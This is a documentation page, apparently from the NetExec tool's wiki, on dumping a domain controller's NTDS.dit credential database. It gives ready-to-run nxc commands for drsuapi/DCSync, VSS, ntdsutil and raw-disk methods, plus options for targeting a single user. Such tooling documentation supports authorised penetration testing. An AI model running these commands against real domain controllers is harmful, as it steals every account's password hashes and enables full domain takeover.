Dump NTDS.dit

Dump the NTDS.dit from target DC using methods from secretsdump.py

Requires Domain Admin or Local Admin Priviledges on target Domain Controller

2 methods are available:   
(default) 	drsuapi -  Uses drsuapi RPC interface create a handle, trigger replication, and combined with   
						additional drsuapi calls to convert the resultant linked-lists into readable format  
			vss - Uses the Volume Shadow copy Service

Dump all users from the NTDS.dit

nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds
nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds --enabled
nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds vss

You can also DCSYNC with the computer account of the DC

Dump a specific user only

nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds --user Administrator

In environments with multiple domains (e.g., parent/child), make sure to specify the full NetBIOS format when using --user, such as: --user NETBIOS/Administrator. This avoids ambiguity when the same username exists in different domains.

Dump NTDS using ntdsutil

There is also the ntdsutil module that will use ntdsutil to dump NTDS.dit and SYSTEM hive and parse them locally with secretsdump.py

nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' -M ntdsutil

Dump NTDS using raw disk access

The ntds-dump-raw module will use raw disk access to extract NTDS.dit and SYSTEM hive by reading directly from the physical drive and parse them locally with secretsdump.py

nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' -M ntds-dump-raw -o TARGET=NTDS

If you are encountering command execution errors, specify an alternative execution method such as --exec-method wmiexec or --exec-method atexec

PreviousDump LSA NextDump LSASS

Last updated 2 months ago

Was this helpful?